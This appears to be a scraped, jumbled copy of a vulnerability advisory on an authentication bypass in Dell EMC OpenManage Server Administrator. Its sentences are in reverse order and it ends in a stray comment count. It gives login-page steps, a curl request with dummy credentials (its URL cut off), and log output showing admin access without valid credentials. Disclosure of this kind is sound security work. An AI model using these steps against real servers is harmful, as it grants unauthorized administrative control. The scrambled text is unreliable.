22:21:48.620 OMAHttpServlet.loginUser: sending parameters to getuserrightsonly, domain= user=AAAA program=omsa localLogin=TRUE computerName=localhost DWS=Research 22:21:48.495 HttpServlet: EnableDWS pref setting is=true 22:21:48.495 HttpServlet: login user: Port is not passed - IPV4 Taking default
22:21:48.479 HttpServlet: login user:value of hostname=localhost 22:21:48.479 HttpServlet: login user:value of ignorecertificate=true 22:21:48.479 true for login via login page, sManualLogin=true 22:21:48.479 value of on mean AD auth, slocalLogin=null 22:21:48.463 CharConverter, added charset while getting bytestream UTF-8 Location: /4A6A8DFC482BD64D/OMSAStart?mode=omsa&vid=4A6A8DFC482BD64DĪnd the log shows more details about the successful authentication bypass login: 22:21:48.463 loginUser.OMAHttpServlet, sUserName=AAAA Strict-Transport-Security: max-age=31536000 curl -ki -d 'manuallogin=true&targetmachine=localhost&user=AAAA&password=BBBB&application=omsa&ignorecertificate=1' ' HTTP/1.1 302 The following CURL command shows a successful OMSA login without knowing a correct username and password, as the response is an HTTP redirect to OMSAStart as opposed to a login page (i.e., omalogin.html). Check the "Ignore certificate warnings" check box.Specify any password (i.e., BBBB) in the Password field.Specify any username (i.e., AAAA) in the Username field.Use localhost in the Hostname / IP address field.Switch to the Manage System Login page (by clicking on the Manage Remote Node link).To perform the authentication bypass, the attacker does the following: It's been observed that any user name and password would work. If the IP/hostname of the remote node is set to localhost, the web server makes a WS-Management connection to the Remote Enablement component on the same host on which the web server is running. It takes the IP/hostname of the remote node, a username and the password and makes an HTTPS WS-Management (i.e., WinRM) connection to the Remote Enablement component on the remote node in order to login to and manage the node. In this case, the web server can be used to connect to a remote node/system. When the Managed System Login feature is enabled, the OMSA web server presents a Managed System Login page. When the OpenManage Server Administrator (OMSA) Web Server and Remote Enablement components are installed on a Dell EMC device and the Managed System Login feature is enabled (disabled by default in v9.5.0), an unauthenticated remote attacker can login to OMSA as admin without knowing a correct OS username and password on that system.
0 kommentar(er)
